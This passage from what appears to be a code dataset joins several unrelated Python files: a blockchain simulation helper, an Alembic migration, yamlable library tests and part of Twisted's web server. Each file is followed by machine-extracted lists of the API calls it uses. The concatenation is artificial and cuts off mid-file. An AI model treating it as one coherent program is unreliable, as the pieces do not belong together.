DEPLOYED_CONTRACTS) + 1: for _ in range(abs(c.tx_upload_count - (round(factor / DEPLOYED_CONTRACTS) + 1))): statuses.append(await c.upload()) except ValueError as v: print(f'{type(v)} [init_sim]: {v}') else: return check_statuses(statuses) def get_credentials(blockchain: str) -> tuple: if blockchain == 'polygon': from settings import ( polygon_private_keys ) return polygon_private_keys from settings import ( quorum_private_keys ) return quorum_private_keys def get_contract(w3, address: Address, compiled_contract_path: str) -> Contract: def get_abi(path: str) -> list: with open(path) as file: contract_json = json.load(file) contract_abi = contract_json['abi'] return contract_abi abi = get_abi(compiled_contract_path) contract = w3.eth.contract(address=address, abi=abi) return contract def check_statuses(statuses: []) -> bool: for idx in range(len(statuses)): if statuses[idx] == 0: return False return True def exists_mkdir(paths: []): for path in paths: if not os.path.exists(path): os.mkdir(path) def get_contracts_config(blockchain: str, msg: bool = True): if msg: print('Retrieve config file...') filename = f'{blockchain}.json' filepath = os.path.join(os.getcwd(), CONFIG_DIR, filename) with open(filepath) as file: contracts_summary = json.loads(file.read()) if msg: print(f'Config file retrieved at {filepath}.') return contracts_summary def range_limited_val(arg: str) -> int: """ Type function for argparse - int within some predefined bounds. """ try: s = int(arg) except ValueError: raise ArgumentTypeError("must be a int number") if s < MIN_VAL or s > MAX_VAL: raise ArgumentTypeError(f"argument must be > {str(MIN_VAL)} and < {str(MAX_VAL)}") return s
[ "os.path.exists", "argparse.ArgumentTypeError", "os.getcwd", "os.mkdir", "json.load" ]
[((2789, 2800), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2798, 2800), False, 'import os\n'), ((2125, 2140), 'json.load', 'json.load', (['file'], {}), '(file)\n', (2134, 2140), False, 'import json\n'), ((2560, 2580), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2574, 2580), False, 'import os\n'), ((2594, 2608), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (2602, 2608), False, 'import os\n'), ((3198, 3239), 'argparse.ArgumentTypeError', 'ArgumentTypeError', (['"""must be a int number"""'], {}), "('must be a int number')\n", (3215, 3239), False, 'from argparse import ArgumentTypeError\n')]
"""add topics Revision ID: 816ea3631582 Revises: <KEY> Create Date: 2021-03-13 14:20:10.044131 """ from alembic import op import sqlalchemy as sa import bot # revision identifiers, used by Alembic. revision = "816ea3631582" down_revision = "<KEY>" branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table( "topics", sa.Column("content", sa.Text(), nullable=False), sa.Column("last_synced_at", bot.database.TIMESTAMP(timezone=True), nullable=True), sa.PrimaryKeyConstraint("content"), ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table("topics") # ### end Alembic commands ###
[ "alembic.op.drop_table", "sqlalchemy.PrimaryKeyConstraint", "bot.database.TIMESTAMP", "sqlalchemy.Text" ]
[((735, 758), 'alembic.op.drop_table', 'op.drop_table', (['"""topics"""'], {}), "('topics')\n", (748, 758), False, 'from alembic import op\n'), ((569, 603), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""content"""'], {}), "('content')\n", (592, 603), True, 'import sqlalchemy as sa\n'), ((442, 451), 'sqlalchemy.Text', 'sa.Text', ([], {}), '()\n', (449, 451), True, 'import sqlalchemy as sa\n'), ((506, 543), 'bot.database.TIMESTAMP', 'bot.database.TIMESTAMP', ([], {'timezone': '(True)'}), '(timezone=True)\n', (528, 543), False, 'import bot\n')]
from copy import copy try: # Python 2 only: from StringIO import StringIO # create a variant that can serve as a context manager class StringIO(StringIO): def __enter__(self): return self def __exit__(self, exception_type, exception_value, traceback): self.close() except ImportError: from io import StringIO try: # python 3.5+ from typing import Dict, Any from yamlable import Y except ImportError: pass import pytest from yaml import dump, load from yamlable import YamlAble, yaml_info def test_yamlable_incomplete_description(): """ Tests that if __yaml_tag_suffix__ is not provided a YamlAble subclass cannot be declared """ with pytest.raises(NotImplementedError) as err_info: class Foo(YamlAble): # __yaml_tag_suffix__ = 'foo' def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo(**dct) # instantiate f = Foo() # dump f.dumps_yaml() assert "does not seem to have a non-None '__yaml_tag_suffix__' field" in str(err_info.value) def test_yamlable(): """ Tests that YamlAble works correctly """ @yaml_info(yaml_tag_ns='yaml.tests') class Foo(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo(**dct) # instantiate f = Foo(1, 'hello') # note: # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.Foo a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == Foo.loads_yaml(y) # load io assert f == Foo.load_yaml(StringIO(y)) # load pyyaml assert f == load(y) def test_yamlable_legacy_method_names(): """ Tests that YamlAbleMixIn works correctly """ global enc global dec enc, dec = False, False @yaml_info(yaml_tag_ns='yaml.tests') class FooLegacy(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def to_yaml_dict(self): # type: (...) -> Dict[str, Any] global enc enc = True return copy(vars(self)) @classmethod def from_yaml_dict(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) 
-> Y global dec dec = True return FooLegacy(**dct) # instantiate f = FooLegacy(1, 'hello') # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.FooLegacy a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == FooLegacy.loads_yaml(y) # load io assert f == FooLegacy.load_yaml(StringIO(y)) # load pyyaml assert f == load(y) assert enc assert dec # TODO override so that tag is not supported, to check error message def test_yamlable_not_supported(): @yaml_info(yaml_tag_ns='yaml.tests') class Foo_Err(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo_Err(**dct) @classmethod def is_yaml_tag_supported(cls, yaml_tag # type: str ): # type: (...) -> bool # ALWAYS return false return False with pytest.raises(TypeError) as err_info: Foo_Err.loads_yaml("!yamlable/yaml.tests.Foo_Err {a: 1, b: hello}\n") assert "No YamlAble subclass found able to decode object" in str(err_info.value) def test_yamlable_default_impl(): """ tests that the default implementation works """ @yaml_info(yaml_tag_ns='yaml.tests') class Foo_Default(YamlAble): def __init__(self, a, b): self.a = a self.b = b f = Foo_Default(1, 'hello') s = """!yamlable/yaml.tests.Foo_Default a: 1 b: hello """ assert dump(f, default_flow_style=False) == s assert dump(load(dump(load(s))), default_flow_style=False) == s def test_help_yaml_info(): @yaml_info("com.example.MyFoo") class Foo(YamlAble): pass assert Foo.__yaml_tag_suffix__ == "com.example.MyFoo" @yaml_info(yaml_tag_ns="com.example") class Foo(YamlAble): pass assert Foo.__yaml_tag_suffix__ == "com.example.Foo" assert Foo().dumps_yaml() == """!yamlable/com.example.Foo {} """ def test_abstract_parent_error(): """This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it""" class AbstractFooE(YamlAble): pass class FooError(AbstractFooE): """ This class inherits from the parent without redefining a yaml tag """ def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) # instantiate e = FooError(1, 'hello') # dump with pytest.raises(NotImplementedError): e.dumps_yaml() def test_abstract_parent(): """This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it""" class AbstractFooV(YamlAble): pass @yaml_info(yaml_tag_ns='yaml.tests') class FooValid(AbstractFooV): def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) # instantiate f = FooValid(1, 'hello') # note: # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.FooValid a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the 
standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == FooValid.loads_yaml(y) # load io assert f == FooValid.load_yaml(StringIO(y)) # load pyyaml assert f == load(y)
[ "yaml.dump", "yaml.load", "pytest.raises", "io.StringIO.close", "io.StringIO", "yamlable.yaml_info" ]
[((1534, 1569), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (1543, 1569), False, 'from yamlable import YamlAble, yaml_info\n'), ((3261, 3296), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (3270, 3296), False, 'from yamlable import YamlAble, yaml_info\n'), ((5081, 5116), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (5090, 5116), False, 'from yamlable import YamlAble, yaml_info\n'), ((6338, 6373), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (6347, 6373), False, 'from yamlable import YamlAble, yaml_info\n'), ((6736, 6766), 'yamlable.yaml_info', 'yaml_info', (['"""com.example.MyFoo"""'], {}), "('com.example.MyFoo')\n", (6745, 6766), False, 'from yamlable import YamlAble, yaml_info\n'), ((6870, 6906), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""com.example"""'}), "(yaml_tag_ns='com.example')\n", (6879, 6906), False, 'from yamlable import YamlAble, yaml_info\n'), ((7876, 7911), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (7885, 7911), False, 'from yamlable import YamlAble, yaml_info\n'), ((721, 755), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (734, 755), False, 'import pytest\n'), ((2914, 2947), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (2918, 2947), False, 'from yaml import dump, load\n'), ((3092, 3099), 'yaml.load', 'load', (['y'], {}), '(y)\n', (3096, 3099), False, 'from yaml import dump, load\n'), ((4740, 4773), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (4744, 4773), False, 'from yaml import dump, load\n'), ((4930, 4937), 'yaml.load', 'load', (['y'], {}), '(y)\n', (4934, 4937), False, 'from yaml import dump, load\n'), ((6038, 6062), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (6051, 6062), False, 'import pytest\n'), ((6593, 6626), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (6597, 6626), False, 'from yaml import dump, load\n'), ((7625, 7659), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (7638, 7659), False, 'import pytest\n'), ((8805, 8838), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (8809, 8838), False, 'from yaml import dump, load\n'), ((8993, 9000), 'yaml.load', 'load', (['y'], {}), '(y)\n', (8997, 9000), False, 'from yaml import dump, load\n'), ((2764, 2784), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (2778, 2784), False, 'from io import StringIO\n'), ((3044, 3055), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (3052, 3055), False, 'from io import StringIO\n'), ((4590, 4610), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (4604, 4610), False, 'from io import StringIO\n'), ((4882, 4893), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (4890, 4893), False, 'from io import StringIO\n'), ((8655, 8675), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (8669, 8675), False, 'from io import StringIO\n'), ((8945, 8956), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (8953, 8956), False, 'from io import StringIO\n'), ((6659, 6666), 'yaml.load', 
'load', (['s'], {}), '(s)\n', (6663, 6666), False, 'from yaml import dump, load\n')]
# -*- test-case-name: twisted.web.test.test_web -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ This is a web server which integrates with the twisted.internet infrastructure. @var NOT_DONE_YET: A token value which L{twisted.web.resource.IResource.render} implementations can return to indicate that the application will later call C{.write} and C{.finish} to complete the request, and that the HTTP connection should be left open. @type NOT_DONE_YET: Opaque; do not depend on any particular type for this value. """ import copy import os import re from html import escape from typing import List, Optional from urllib.parse import quote as _quote import zlib from binascii import hexlify from zope.interface import implementer from twisted.python.compat import networkString, nativeString from twisted.spread.pb import Copyable, ViewPoint from twisted.internet import address, interfaces from twisted.internet.error import AlreadyCalled, AlreadyCancelled from twisted.web import iweb, http, util from twisted.web.http import unquote from twisted.python import reflect, failure, components from twisted import copyright from twisted.web import resource from twisted.web.error import UnsupportedMethod from incremental import Version from twisted.python.deprecate import deprecatedModuleAttribute from twisted.logger import Logger NOT_DONE_YET = 1 __all__ = [ "supportedMethods", "Request", "Session", "Site", "version", "NOT_DONE_YET", "GzipEncoderFactory", ] # backwards compatibility deprecatedModuleAttribute( Version("Twisted", 12, 1, 0), "Please use twisted.web.http.datetimeToString instead", "twisted.web.server", "date_time_string", ) deprecatedModuleAttribute( Version("Twisted", 12, 1, 0), "Please use twisted.web.http.stringToDatetime instead", "twisted.web.server", "string_date_time", ) date_time_string = http.datetimeToString string_date_time = http.stringToDatetime # Support for other methods may be implemented on a per-resource basis. supportedMethods = (b"GET", b"HEAD", b"POST") def quote(string, *args, **kwargs): return _quote(string.decode("charmap"), *args, **kwargs).encode("charmap") def _addressToTuple(addr): if isinstance(addr, address.IPv4Address): return ("INET", addr.host, addr.port) elif isinstance(addr, address.UNIXAddress): return ("UNIX", addr.name) else: return tuple(addr) @implementer(iweb.IRequest) class Request(Copyable, http.Request, components.Componentized): """ An HTTP request. @ivar defaultContentType: A L{bytes} giving the default I{Content-Type} value to send in responses if no other value is set. L{None} disables the default. @ivar _insecureSession: The L{Session} object representing state that will be transmitted over plain-text HTTP. @ivar _secureSession: The L{Session} object representing the state that will be transmitted only over HTTPS. 
""" defaultContentType = b"text/html" site = None appRootURL = None prepath: Optional[List[bytes]] = None postpath: Optional[List[bytes]] = None __pychecker__ = "unusednames=issuer" _inFakeHead = False _encoder = None _log = Logger() def __init__(self, *args, **kw): http.Request.__init__(self, *args, **kw) components.Componentized.__init__(self) def getStateToCopyFor(self, issuer): x = self.__dict__.copy() del x["transport"] # XXX refactor this attribute out; it's from protocol # del x['server'] del x["channel"] del x["content"] del x["site"] self.content.seek(0, 0) x["content_data"] = self.content.read() x["remote"] = ViewPoint(issuer, self) # Address objects aren't jellyable x["host"] = _addressToTuple(x["host"]) x["client"] = _addressToTuple(x["client"]) # Header objects also aren't jellyable. x["requestHeaders"] = list(x["requestHeaders"].getAllRawHeaders()) return x # HTML generation helpers def sibLink(self, name): """ Return the text that links to a sibling of the requested resource. @param name: The sibling resource @type name: C{bytes} @return: A relative URL. @rtype: C{bytes} """ if self.postpath: return (len(self.postpath) * b"../") + name else: return name def childLink(self, name): """ Return the text that links to a child of the requested resource. @param name: The child resource @type name: C{bytes} @return: A relative URL. @rtype: C{bytes} """ lpp = len(self.postpath) if lpp > 1: return ((lpp - 1) * b"../") + name elif lpp == 1: return name else: # lpp == 0 if len(self.prepath) and self.prepath[-1]: return self.prepath[-1] + b"/" + name else: return name def gotLength(self, length): """ Called when HTTP channel got length of content in this request. This method is not intended for users. @param length: The length of the request body, as indicated by the request headers. L{None} if the request headers do not indicate a length. """ try: getContentFile = self.channel.site.getContentFile except AttributeError: http.Request.gotLength(self, length) else: self.content = getContentFile(length) def process(self): """ Process a request. Find the addressed resource in this request's L{Site}, and call L{self.render()<Request.render()>} with it. @see: L{Site.getResourceFor()} """ # get site from channel self.site = self.channel.site # set various default headers self.setHeader(b"server", version) self.setHeader(b"date", http.datetimeToString()) # Resource Identification self.prepath = [] self.postpath = list(map(unquote, self.path[1:].split(b"/"))) # Short-circuit for requests whose path is '*'. if self.path == b"*": self._handleStar() return try: resrc = self.site.getResourceFor(self) if resource._IEncodingResource.providedBy(resrc): encoder = resrc.getEncoder(self) if encoder is not None: self._encoder = encoder self.render(resrc) except BaseException: self.processingFailed(failure.Failure()) def write(self, data): """ Write data to the transport (if not responding to a HEAD request). @param data: A string to write to the response. @type data: L{bytes} """ if not self.startedWriting: # Before doing the first write, check to see if a default # Content-Type header should be supplied. We omit it on # NOT_MODIFIED and NO_CONTENT responses. We also omit it if there # is a Content-Length header set to 0, as empty bodies don't need # a content-type. 
needsCT = self.code not in (http.NOT_MODIFIED, http.NO_CONTENT) contentType = self.responseHeaders.getRawHeaders(b"content-type") contentLength = self.responseHeaders.getRawHeaders(b"content-length") contentLengthZero = contentLength and (contentLength[0] == b"0") if ( needsCT and contentType is None and self.defaultContentType is not None and not contentLengthZero ): self.responseHeaders.setRawHeaders( b"content-type", [self.defaultContentType] ) # Only let the write happen if we're not generating a HEAD response by # faking out the request method. Note, if we are doing that, # startedWriting will never be true, and the above logic may run # multiple times. It will only actually change the responseHeaders # once though, so it's still okay. if not self._inFakeHead: if self._encoder: data = self._encoder.encode(data) http.Request.write(self, data) def finish(self): """ Override C{http.Request.finish} for possible encoding. """ if self._encoder: data = self._encoder.finish() if data: http.Request.write(self, data) return http.Request.finish(self) def render(self, resrc): """ Ask a resource to render itself. If the resource does not support the requested method, generate a C{NOT IMPLEMENTED} or C{NOT ALLOWED} response. @param resrc: The resource to render. @type resrc: L{twisted.web.resource.IResource} @see: L{IResource.render()<twisted.web.resource.IResource.render()>} """ try: body = resrc.render(self) except UnsupportedMethod as e: allowedMethods = e.allowedMethods if (self.method == b"HEAD") and (b"GET" in allowedMethods): # We must support HEAD (RFC 2616, 5.1.1). If the # resource doesn't, fake it by giving the resource # a 'GET' request and then return only the headers, # not the body. self._log.info( "Using GET to fake a HEAD request for {resrc}", resrc=resrc ) self.method = b"GET" self._inFakeHead = True body = resrc.render(self) if body is NOT_DONE_YET: self._log.info( "Tried to fake a HEAD request for {resrc}, but " "it got away from me.", resrc=resrc, ) # Oh well, I guess we won't include the content length. else: self.setHeader(b"content-length", b"%d" % (len(body),)) self._inFakeHead = False self.method = b"HEAD" self.write(b"") self.finish() return if self.method in (supportedMethods): # We MUST include an Allow header # (RFC 2616, 10.4.6 and 14.7) self.setHeader(b"Allow", b", ".join(allowedMethods)) s = ( """Your browser approached me (at %(URI)s) with""" """ the method "%(method)s". I only allow""" """ the method%(plural)s %(allowed)s here.""" % { "URI": escape(nativeString(self.uri)), "method": nativeString(self.method), "plural": ((len(allowedMethods) > 1) and "s") or "", "allowed": ", ".join([nativeString(x) for x in allowedMethods]), } ) epage = resource.ErrorPage(http.NOT_ALLOWED, "Method Not Allowed", s) body = epage.render(self) else: epage = resource.ErrorPage( http.NOT_IMPLEMENTED, "Huh?", "I don't know how to treat a %s request." % (escape(self.method.decode("charmap")),), ) body = epage.render(self) # end except UnsupportedMethod if body is NOT_DONE_YET: return if not isinstance(body, bytes): body = resource.ErrorPage( http.INTERNAL_SERVER_ERROR, "Request did not return bytes", "Request: " + util._PRE(reflect.safe_repr(self)) + "<br />" + "Resource: " + util._PRE(reflect.safe_repr(resrc)) + "<br />" + "Value: " + util._PRE(reflect.safe_repr(body)), ).render(self) if self.method == b"HEAD": if len(body) > 0: # This is a Bad Thing (RFC 2616, 9.4) self._log.info( "Warning: HEAD request {slf} for resource {resrc} is" " returning a message body. 
I think I'll eat it.", slf=self, resrc=resrc, ) self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(b"") else: self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(body) self.finish() def processingFailed(self, reason): """ Finish this request with an indication that processing failed and possibly display a traceback. @param reason: Reason this request has failed. @type reason: L{twisted.python.failure.Failure} @return: The reason passed to this method. @rtype: L{twisted.python.failure.Failure} """ self._log.failure("", failure=reason) if self.site.displayTracebacks: body = ( b"<html><head><title>web.Server Traceback" b" (most recent call last)</title></head>" b"<body><b>web.Server Traceback" b" (most recent call last):</b>\n\n" + util.formatFailure(reason) + b"\n\n</body></html>\n" ) else: body = ( b"<html><head><title>Processing Failed" b"</title></head><body>" b"<b>Processing Failed</b></body></html>" ) self.setResponseCode(http.INTERNAL_SERVER_ERROR) self.setHeader(b"content-type", b"text/html") self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(body) self.finish() return reason def view_write(self, issuer, data): """Remote version of write; same interface.""" self.write(data) def view_finish(self, issuer): """Remote version of finish; same interface.""" self.finish() def view_addCookie(self, issuer, k, v, **kwargs): """Remote version of addCookie; same interface.""" self.addCookie(k, v, **kwargs) def view_setHeader(self, issuer, k, v): """Remote version of setHeader; same interface.""" self.setHeader(k, v) def view_setLastModified(self, issuer, when): """Remote version of setLastModified; same interface.""" self.setLastModified(when) def view_setETag(self, issuer, tag): """Remote version of setETag; same interface.""" self.setETag(tag) def view_setResponseCode(self, issuer, code, message=None): """ Remote version of setResponseCode; same interface. """ self.setResponseCode(code, message) def view_registerProducer(self, issuer, producer, streaming): """Remote version of registerProducer; same interface. (requires a remote producer.) """ self.registerProducer(_RemoteProducerWrapper(producer), streaming) def view_unregisterProducer(self, issuer): self.unregisterProducer() ### these calls remain local _secureSession = None _insecureSession = None @property def session(self): """ If a session has already been created or looked up with L{Request.getSession}, this will return that object. (This will always be the session that matches the security of the request; so if C{forceNotSecure} is used on a secure request, this will not return that session.) @return: the session attribute @rtype: L{Session} or L{None} """ if self.isSecure(): return self._secureSession else: return self._insecureSession def getSession(self, sessionInterface=None, forceNotSecure=False): """ Check if there is a session cookie, and if not, create it. By default, the cookie with be secure for HTTPS requests and not secure for HTTP requests. If for some reason you need access to the insecure cookie from a secure request you can set C{forceNotSecure = True}. @param forceNotSecure: Should we retrieve a session that will be transmitted over HTTP, even if this L{Request} was delivered over HTTPS? 
@type forceNotSecure: L{bool} """ # Make sure we aren't creating a secure session on a non-secure page secure = self.isSecure() and not forceNotSecure if not secure: cookieString = b"TWISTED_SESSION" sessionAttribute = "_insecureSession" else: cookieString = b"TWISTED_SECURE_SESSION" sessionAttribute = "_secureSession" session = getattr(self, sessionAttribute) if session is not None: # We have a previously created session. try: # Refresh the session, to keep it alive. session.touch() except (AlreadyCalled, AlreadyCancelled): # Session has already expired. session = None if session is None: # No session was created yet for this request. cookiename = b"_".join([cookieString] + self.sitepath) sessionCookie = self.getCookie(cookiename) if sessionCookie: try: session = self.site.getSession(sessionCookie) except KeyError: pass # if it still hasn't been set, fix it up. if not session: session = self.site.makeSession() self.addCookie(cookiename, session.uid, path=b"/", secure=secure) setattr(self, sessionAttribute, session) if sessionInterface: return session.getComponent(sessionInterface) return session def _prePathURL(self, prepath): port = self.getHost().port if self.isSecure(): default = 443 else: default = 80 if port == default: hostport = "" else: hostport = ":%d" % port prefix = networkString( "http%s://%s%s/" % ( self.isSecure() and "s" or "", nativeString(self.getRequestHostname()), hostport, ) ) path = b"/".join([quote(segment, safe=b"") for segment in prepath]) return prefix + path def prePathURL(self): return self._prePathURL(self.prepath) def URLPath(self): from twisted.python import urlpath return urlpath.URLPath.fromRequest(self) def rememberRootURL(self): """ Remember the currently-processed part of the URL for later recalling. """ url = self._prePathURL(self.prepath[:-1]) self.appRootURL = url def getRootURL(self): """ Get a previously-remembered URL. @return: An absolute URL. @rtype: L{bytes} """ return self.appRootURL def _handleStar(self): """ Handle receiving a request whose path is '*'. RFC 7231 defines an OPTIONS * request as being something that a client can send as a low-effort way to probe server capabilities or readiness. Rather than bother the user with this, we simply fast-path it back to an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed telling the client they can only use OPTIONS. """ if self.method == b"OPTIONS": self.setResponseCode(http.OK) else: self.setResponseCode(http.NOT_ALLOWED) self.setHeader(b"Allow", b"OPTIONS") # RFC 7231 says we MUST set content-length 0 when responding to this # with no body. self.setHeader(b"Content-Length", b"0") self.finish() @implementer(iweb._IRequestEncoderFactory) class GzipEncoderFactory: """ @cvar compressLevel: The compression level used by the compressor, default to 9 (highest). @since: 12.3 """ _gzipCheckRegex = re.compile(br"(:?^|[\s,])gzip(:?$|[\s,])") compressLevel = 9 def encoderForRequest(self, request): """ Check the headers if the client accepts gzip encoding, and encodes the request if so. """ acceptHeaders = b",".join( request.requestHeaders.getRawHeaders(b"accept-encoding", []) ) if self._gzipCheckRegex.search(acceptHeaders): encoding = request.responseHeaders.getRawHeaders(b"content-encoding") if encoding: encoding = b",".join(encoding + [b"gzip"]) else: encoding = b"gzip" request.responseHeaders.setRawHeaders(b"content-encoding", [encoding]) return _GzipEncoder(self.compressLevel, request) @implementer(iweb._IRequestEncoder) class _GzipEncoder: """ An encoder which supports gzip. 
@ivar _zlibCompressor: The zlib compressor instance used to compress the stream. @ivar _request: A reference to the originating request. @since: 12.3 """ _zlibCompressor = None def __init__(self, compressLevel, request): self._zlibCompressor = zlib.compressobj( compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS ) self._request = request def encode(self, data): """ Write to the request, automatically compressing data on the fly. """ if not self._request.startedWriting: # Remove the content-length header, we can't honor it # because we compress on the fly. self._request.responseHeaders.removeHeader(b"content-length") return self._zlibCompressor.compress(data) def finish(self): """ Finish handling the request request, flushing any data from the zlib buffer. """ remain = self._zlibCompressor.flush() self._zlibCompressor = None return remain class _RemoteProducerWrapper: def __init__(self, remote): self.resumeProducing = remote.remoteMethod("resumeProducing") self.pauseProducing = remote.remoteMethod("pauseProducing") self.stopProducing = remote.remoteMethod("stopProducing") class Session(components.Componentized): """ A user's session with a system. This utility class contains no functionality, but is used to represent a session. @ivar site: The L{Site} that generated the session. @type site: L{Site} @ivar uid: A unique identifier for the session. @type uid: L{bytes} @ivar _reactor: An object providing L{IReactorTime} to use for scheduling expiration. @ivar sessionTimeout: Time after last modification the session will expire, in seconds. @type sessionTimeout: L{float} @ivar lastModified: Time the C{touch()} method was last called (or time the session was created). A UNIX timestamp as returned by L{IReactorTime.seconds()}. @type lastModified: L{float} """ sessionTimeout = 900 _expireCall = None def __init__(self, site, uid, reactor=None): """ Initialize a session with a unique ID for that session. @param reactor: L{IReactorTime} used to schedule expiration of the session. If C{None}, the reactor associated with I{site} is used. """ super().__init__() if reactor is None: reactor = site.reactor self._reactor = reactor self.site = site self.uid = uid self.expireCallbacks = [] self.touch() self.sessionNamespaces = {} def startCheckingExpiration(self): """ Start expiration tracking. @return: L{None} """ self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire) def notifyOnExpire(self, callback): """ Call this callback when the session expires or logs out. """ self.expireCallbacks.append(callback) def expire(self): """ Expire/logout of the session. """ del self.site.sessions[self.uid] for c in self.expireCallbacks: c() self.expireCallbacks = [] if self._expireCall and self._expireCall.active(): self._expireCall.cancel() # Break reference cycle. self._expireCall = None def touch(self): """ Mark the session as modified, which resets expiration timer. """ self.lastModified = self._reactor.seconds() if self._expireCall is not None: self._expireCall.reset(self.sessionTimeout) version = networkString(f"TwistedWeb/{copyright.version}") @implementer(interfaces.IProtocolNegotiationFactory) class Site(http.HTTPFactory): """ A web site: manage log, sessions, and resources. @ivar requestFactory: A factory which is called with (channel) and creates L{Request} instances. Default to L{Request}. @ivar displayTracebacks: If set, unhandled exceptions raised during rendering are returned to the client as HTML. Default to C{False}. @ivar sessionFactory: factory for sessions objects. 
Default to L{Session}. @ivar sessions: Mapping of session IDs to objects returned by C{sessionFactory}. @type sessions: L{dict} mapping L{bytes} to L{Session} given the default C{sessionFactory} @ivar counter: The number of sessions that have been generated. @type counter: L{int} @ivar sessionCheckTime: Deprecated and unused. See L{Session.sessionTimeout} instead. """ counter = 0 requestFactory = Request displayTracebacks = False sessionFactory = Session sessionCheckTime = 1800 _entropy = os.urandom def __init__(self, resource, requestFactory=None, *args, **kwargs): """ @param resource: The root of the resource hierarchy. All request traversal for requests received by this factory will begin at this resource. @type resource: L{IResource} provider @param requestFactory: Overwrite for default requestFactory. @type requestFactory: C{callable} or C{class}. @see: L{twisted.web.http.HTTPFactory.__init__} """ super().__init__(*args, **kwargs) self.sessions = {} self.resource = resource if requestFactory is not None: self.requestFactory = requestFactory def _openLogFile(self, path): from twisted.python import logfile 